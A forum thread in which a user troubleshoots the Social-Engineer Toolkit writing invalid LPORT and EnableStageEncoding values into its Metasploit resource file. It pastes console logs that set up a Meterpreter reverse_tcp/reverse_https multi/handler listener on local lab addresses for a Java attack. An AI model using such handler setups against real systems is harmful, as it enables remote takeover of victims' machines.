Results 1 to 4 of 4

Thread: SET not setting correct options

  1. #1
    Join Date
    2013-Nov
    Posts
    24

    SET is trying to set LPORT as false???

    Code:
    resource (/root/.set/meta_config)> set EnableStageEncoding 21
    EnableStageEncoding => 21
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.5
    LHOST => 192.168.1.5
    resource (/root/.set/meta_config)> set EnableStageEncoding 25
    EnableStageEncoding => 25
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    As you can see, SET is trying to set LPORT as false and EnableStageEncoding to 25. I tried to update right before I loaded these modules (website nuke option) but this it the lastest version.
    Last edited by polyphemus; 2013-12-27 at 17:48.
    Visit my blog! PenTesting for Amateurs, by Amateurs -- Request your own tutorial, or send one to me to post.
    "thevanoutside" a Wordpress Blog!

  2. #2
    Join Date
    2013-Nov
    Posts
    24
    Code:
    [*] Processing /root/.set/meta_config for ERB directives.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 22
    EnableStageEncoding => 22
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 53
    EnableStageEncoding => 53
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 443
    EnableStageEncoding => 443
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 21
    EnableStageEncoding => 21
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 25
    EnableStageEncoding => 25
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set LPORT 443
    LPORT => 443
    resource (/root/.set/meta_config)> set EnableStageEncoding false
    EnableStageEncoding => false
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> exploit -j[*] Exploit running as background job.
    This is when I choose the JAVA exploit
    Visit my blog! PenTesting for Amateurs, by Amateurs -- Request your own tutorial, or send one to me to post.
    "thevanoutside" a Wordpress Blog!

  3. #3
    Join Date
    2014-Jan
    Posts
    1

    Solved?

    Quote Originally Posted by polyphemus View Post
    Code:
    [*] Processing /root/.set/meta_config for ERB directives.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 22
    EnableStageEncoding => 22
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 53
    EnableStageEncoding => 53
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 443
    EnableStageEncoding => 443
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 21
    EnableStageEncoding => 21
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set EnableStageEncoding 25
    EnableStageEncoding => 25
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> set LPORT false
    LPORT => false
    resource (/root/.set/meta_config)> exploit -j
    [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
    resource (/root/.set/meta_config)> use exploit/multi/handler
    resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    resource (/root/.set/meta_config)> set LHOST 192.168.1.14
    LHOST => 192.168.1.14
    resource (/root/.set/meta_config)> set LPORT 443
    LPORT => 443
    resource (/root/.set/meta_config)> set EnableStageEncoding false
    EnableStageEncoding => false
    resource (/root/.set/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/root/.set/meta_config)> exploit -j[*] Exploit running as background job.
    This is when I choose the JAVA exploit


    Have you figured out what your problem was?

  4. #4
    Join Date
    2013-Mar
    Posts
    85
    I would try contacting the author if this is a bug.

Similar Threads

  1. All boot options are tried
    By FeedSauron in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2022-01-01, 23:54
  2. Replies: 0
    Last Post: 2021-09-10, 02:49
  3. nping ip-options
    By quarinteen in forum General Archive
    Replies: 1
    Last Post: 2019-06-07, 18:19
  4. Add options of wifite
    By useuser156654 in forum General Archive
    Replies: 1
    Last Post: 2016-09-06, 11:44
  5. setoolkit options
    By brazen in forum General Archive
    Replies: 0
    Last Post: 2015-02-18, 18:50

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •